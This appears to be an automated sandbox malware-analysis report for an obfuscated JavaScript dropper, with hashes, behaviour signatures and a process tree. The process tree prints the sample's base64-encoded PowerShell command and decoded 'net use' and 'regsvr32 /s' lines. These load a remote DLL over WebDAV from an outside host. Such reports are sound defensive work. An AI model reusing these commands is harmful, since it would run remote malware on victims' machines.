Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
26/07/2024, 03:59
Static task
static1
Behavioral task
behavioral1
Sample
726120506298117592.js
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
726120506298117592.js
Resource
win10v2004-20240709-en
General
-
Target
726120506298117592.js
-
Size
17KB
-
MD5
05c6299b40a9bda734b0880ef6456dfa
-
SHA1
5232fc523e5b6d0b9099fea32017d9628c23179c
-
SHA256
d1ab87a11ff5ffd2943261df8a24b126bc911d63ac6c00db6fe993895e309662
-
SHA512
bd56dd7b0591baa9834e214a958b59bba07ac9d45786def53860f1a4f8cbe9413152d0ac90460c7337fdd1de8ca354e1c46535d6df315dc8557e9ce6611c8f75
-
SSDEEP
192:YvYGLbLc//wW9ANtGGR7GfGcyJ2f/Jh3/6GfGcyJ2f/gFiwH:///wWGR7zJ2f/Jh3/6zJ2f/gwk
Malware Config
Signatures
-
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2848 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2848 powershell.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 2244 wrote to memory of 2848 2244 wscript.exe 30 PID 2244 wrote to memory of 2848 2244 wscript.exe 30 PID 2244 wrote to memory of 2848 2244 wscript.exe 30 PID 2848 wrote to memory of 2860 2848 powershell.exe 32 PID 2848 wrote to memory of 2860 2848 powershell.exe 32 PID 2848 wrote to memory of 2860 2848 powershell.exe 32 PID 2848 wrote to memory of 2916 2848 powershell.exe 33 PID 2848 wrote to memory of 2916 2848 powershell.exe 33 PID 2848 wrote to memory of 2916 2848 powershell.exe 33 PID 2848 wrote to memory of 2916 2848 powershell.exe 33 PID 2848 wrote to memory of 2916 2848 powershell.exe 33
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\726120506298117592.js1⤵
- Suspicious use of WriteProcessMemory
PID:2244 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABkAGEAaQBsAHkAdwBlAGIAcwB0AGEAdABzAC4AYwBvAG0AQAA4ADgAOAA4AFwAZABhAHYAdwB3AHcAcgBvAG8AdABcACAAOwAgAHIAZQBnAHMAdgByADMAMgAgAC8AcwAgAFwAXABkAGEAaQBsAHkAdwBlAGIAcwB0AGEAdABzAC4AYwBvAG0AQAA4ADgAOAA4AFwAZABhAHYAdwB3AHcAcgBvAG8AdABcADIAOAA5ADMAOAA4ADUANAAyADMAMAAxADcALgBkAGwAbAA=2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2848 -
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" use \\dailywebstats.com@8888\davwwwroot\3⤵PID:2860
-
-
C:\Windows\system32\regsvr32.exe"C:\Windows\system32\regsvr32.exe" /s \\dailywebstats.com@8888\davwwwroot\2893885423017.dll3⤵PID:2916
-
-